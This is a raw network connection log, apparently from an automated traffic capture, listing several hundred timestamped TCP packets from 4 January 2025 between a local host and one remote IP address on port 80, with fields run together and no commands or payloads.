                                                                                                    Jan 4, 2025 14:52:20.241079092 CET4973380192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.570363998 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.599850893 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.600050926 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.600106001 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.739820004 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.863586903 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.870229959 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.871377945 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:20.876379967 CET8049736154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:20.876435995 CET4973680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:21.663126945 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:21.668133020 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:21.668226957 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:21.668365955 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:21.673216105 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.020023108 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.024985075 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.025000095 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.025010109 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.194622993 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.324806929 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.324867010 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.617723942 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.618087053 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.622570992 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.622665882 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.622785091 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.623049021 CET8049737154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.623095989 CET4973780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.627526045 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.973128080 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:22.978044033 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.978063107 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:22.978072882 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.148946047 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.279915094 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.280144930 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.634776115 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.635379076 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.639789104 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.639852047 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.640206099 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.640358925 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.640535116 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.645407915 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.990158081 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995044947 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995058060 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995070934 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995080948 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995120049 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995121956 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995176077 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995218992 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995229006 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995270014 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995275974 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995280981 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995341063 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995363951 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.998620033 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.999942064 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.999953032 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.999963045 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.000004053 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.000008106 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.000025034 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.000030994 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.000056982 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.000066996 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.000108957 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.039581060 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.042726994 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.047657013 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047693014 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047718048 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047775030 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047852039 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047875881 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.047903061 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047908068 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.047914982 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047950029 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047960997 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.047961950 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.047995090 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048012018 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.048026085 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048043966 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048051119 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.048053980 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048077106 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048079014 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.048085928 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048108101 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.048115969 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048126936 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048160076 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048168898 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048197985 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048207045 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048235893 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048247099 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048306942 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048316002 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048372030 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048381090 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.048391104 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052840948 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052853107 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052860975 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052870035 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052921057 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052930117 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052972078 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.052980900 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053018093 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053026915 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053078890 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053088903 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053100109 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053117037 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053165913 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053219080 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053261042 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053271055 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053287029 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053297043 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053375959 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053385019 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053419113 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053428888 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053440094 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053481102 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053488970 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053498983 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053581953 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053591013 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053643942 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053653955 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053666115 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053709030 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053718090 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053761959 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.053771019 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.167165041 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.301119089 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.462846994 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.597969055 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.865536928 CET4974480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.870445013 CET8049744154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.870529890 CET4974480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.882196903 CET4974480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.887077093 CET8049744154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.889292002 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:24.894423008 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:24.894474983 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.001487017 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.006288052 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.006362915 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.006479979 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.009721041 CET4974480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.011275053 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.055423021 CET8049744154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.262507915 CET8049744154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.262563944 CET4974480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.364029884 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.369465113 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.369481087 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.369491100 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.548212051 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.676079988 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.681894064 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.809993982 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.810409069 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.815840960 CET8049745154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.815855980 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:25.815891027 CET4974580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.815933943 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.816062927 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:25.821527004 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.162619114 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.167551994 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.167566061 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.167577028 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.390369892 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.526015997 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.530610085 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.799695969 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.800157070 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.804723024 CET8049746154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.804863930 CET4974680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.804953098 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:26.805159092 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.805159092 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:26.809940100 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.165388107 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.272768974 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.272787094 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.272795916 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.350290060 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.472992897 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.483858109 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.660285950 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.660811901 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.665446997 CET8049748154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.665499926 CET4974880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.665568113 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:27.665632010 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.665738106 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:27.670500994 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.020119905 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.025094986 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.025110006 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.025120974 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.190926075 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.316922903 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.320087910 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.443085909 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.443380117 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.448076963 CET8049749154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.448124886 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.448148012 CET4974980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.448189974 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.448302031 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.453190088 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.801211119 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:28.806153059 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.806164980 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.806175947 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:28.972592115 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.102885962 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.102937937 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.228410006 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.229033947 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.233463049 CET8049751154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.233525038 CET4975180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.233891010 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.233962059 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.234065056 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.238869905 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.582921982 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.717483997 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.717622995 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.717633009 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.766499043 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:29.910614967 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:29.913481951 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.069463015 CET4975480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.074383974 CET8049754154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.074664116 CET4975480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.077143908 CET4975480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.081931114 CET8049754154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.098004103 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.105201006 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.110274076 CET8049752154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.110639095 CET4975280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.141761065 CET4975480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.187395096 CET8049754154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.439083099 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.443969011 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.444041967 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.444156885 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.448982954 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.467605114 CET8049754154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.467664003 CET4975480192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.801223993 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:30.806206942 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.806245089 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.806256056 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:30.980217934 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.097980022 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.114032030 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.238893986 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.239612103 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.244082928 CET8049755154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.244214058 CET4975580192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.244441032 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.244556904 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.244667053 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.249469995 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.598114967 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.603091002 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.603105068 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.603113890 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.761879921 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.863641977 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:31.890424967 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:31.973176956 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.057487011 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.058180094 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.062568903 CET8049756154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.062647104 CET4975680192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.062994957 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.063076973 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.067415953 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.072186947 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.426287889 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:32.431303978 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.431325912 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.431335926 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.747458935 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.879081011 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:32.879283905 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.355262995 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.355587006 CET4975880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.360481977 CET8049757154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.360528946 CET8049758154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.360589027 CET4975780192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.360651016 CET4975880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.360832930 CET4975880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.365631104 CET8049758154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.707468033 CET4975880192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:33.712392092 CET8049758154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.712517023 CET8049758154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.712527037 CET8049758154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.877618074 CET8049758154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:33.988646030 CET4975880192.168.2.4154.29.71.9
